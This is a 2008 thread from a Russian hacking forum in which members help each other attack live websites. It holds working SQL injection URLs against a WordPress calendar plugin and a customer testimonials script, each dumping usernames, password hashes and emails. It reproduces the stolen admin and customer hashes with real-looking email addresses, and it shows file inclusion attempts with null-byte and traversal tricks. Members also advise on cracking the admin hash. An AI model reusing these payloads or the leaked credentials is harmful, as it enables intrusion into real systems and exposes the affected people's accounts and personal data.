 |
|
06.02.2008, 23:59
|
|
Banned
Регистрация: 07.07.2007
Сообщений: 152
С нами:
9919106
Репутация:
52
|
|
Мало ли IP привязан к Админу смотри лучше должны же пассы где-то быть не с неба же упали))) ИЩИ!
|
|
|
07.02.2008, 00:09
|
|
Познающий
Регистрация: 21.01.2008
Сообщений: 85
С нами:
9633635
Репутация:
338
|
|
Сообщение от Conquerstador
Мало ли IP привязан к Админу смотри лучше должны же пассы где-то быть не с неба же упали))) ИЩИ!
Вводил пассы от MySQL базы тоже нифига)
|
|
|
|
07.02.2008, 23:53
|
|
Познающий
Регистрация: 21.01.2008
Сообщений: 85
С нами:
9633635
Репутация:
338
|
|
Я первый раз занимаюсь SQL инекцией 
Вот подскажите это SQL инекция или нет? По моему да, токо хочу узнать на 100%
Код HTML:
http://brownberets.info/wp-content/plugins/wp-cal/functions/editevent.php? id=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email), 3,4,5,6%20from%20wp_users--
и там вот это потом написано
Edit event admin:cd59cc41aa03d53c9336522d40ee4339:bradley@ris eup.net
cd59cc41aa03d53c9336522d40ee4339 это кажется MD5, если я не ошибаюсь)
Это моя первая тема про SQL так что не пинайте)
Спасибо за внимание
Последний раз редактировалось CaNNabi$; 07.02.2008 в 23:59..
|
|
|
|
07.02.2008, 23:57
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
CaNNabi$, да инъекция ))) Можешь юзать лимит, что бы посмотреть инфу по остальным юзерам
http://brownberets.info/wp-content/plugins/wp-cal/functions/editevent.php?id=-1+union+select+1,concat(user_login,0x3a,user_pass, 0x3a,user_email),3,4,5,6+from+wp_users+limit+1,1--
|
|
|
|
08.02.2008, 00:00
|
|
Познающий
Регистрация: 21.01.2008
Сообщений: 85
С нами:
9633635
Репутация:
338
|
|
Сообщение от ElteRUS
CaNNabi$, да инъекция ))) Можешь юзать лимит, что бы посмотреть инфу по остальным юзерам
http://brownberets.info/wp-content/plugins/wp-cal/functions/editevent.php?id=-1+union+select+1,concat(user_login,0x3a,user_pass, 0x3a,user_email),3,4,5,6+from+wp_users+limit+1,1--
Спасибо что подсказал, наконец то сбылась моя мечта, я так рад ппц как) давно хотел узнать хотел сделать SQL инекцию, ааа ништяк)
Терь моно в раздел SQL инекций добавлять)
Последний раз редактировалось CaNNabi$; 08.02.2008 в 00:03..
|
|
|
|
08.02.2008, 00:38
|
|
Познающий
Регистрация: 21.01.2008
Сообщений: 85
С нами:
9633635
Репутация:
338
|
|
А вот это нуно рашифровать cd59cc41aa03d53c9336522d40ee4339 и я получу пароль от админки? Или как?)
Повторяю я новичок в этом деле |
|
|
|
08.02.2008, 00:59
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами:
10309346
Репутация:
4303
|
|
угу, от админки ворд пресса
|
|
|
|
08.02.2008, 02:11
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
С нами:
10254549
Репутация:
227
|
|
у меня такая ситуация:
index.php?d=files&p=../index
инклудится индекс. Видно, что добавляется .php в конец.
index.php?d=files&p=../index.php%00
index.php?d=files&p=../index.php?
index.php?d=files&p=../index.php//
не прокатывает! Ошибку выдёт. Там Винда стоит.
Есть ли шанс приишклудить файл с другим расширением, отличным от php?
|
|
|
|
08.02.2008, 02:16
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами:
10309346
Репутация:
4303
|
|
скорее всего нет, ибо magic_quotes или просто фильр стоит, попробуй объявить переменную через куки или постом, хотя навряд ли прокатит
|
|
|
|
08.02.2008, 07:03
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
С нами:
10263663
Репутация:
1559
|
|
http://www.site.com/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
и выводится вот такой вид хешёй немогу понять что это именно мд5 или всё таки соль?
Weinstein:425207c6e60ffa47065702619d9a8e76:aa:happ iquilter@verizon.net
Fisher:6ab6348c5cb2b47c1afdb254d23f6717:f2:bizzybe adz@gmail.com
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
